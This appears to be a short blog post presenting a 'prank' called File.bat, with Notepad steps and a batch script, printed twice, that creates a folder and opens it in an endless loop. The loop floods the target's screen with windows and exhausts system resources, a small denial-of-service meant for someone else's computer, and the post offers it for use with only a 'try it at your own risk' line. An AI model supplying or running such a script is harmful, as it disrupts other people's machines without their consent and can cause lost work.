Prank Name: File.bat
Description: This prank will create and open a file that they cannot close, minimize, or maximize without closing the command prompt behind it.
1. Go into Notepad
2. Type the text below.
@echo off
md hello
:A
start hello
goto A
3. Save it as file.bat
1. Go into Notepad
2. Type the text below.
@echo off
md hello
:A
start hello
goto A
3. Save it as file.bat
``````````````````````try it at your own risk``````````````````````````
No comments:
Post a Comment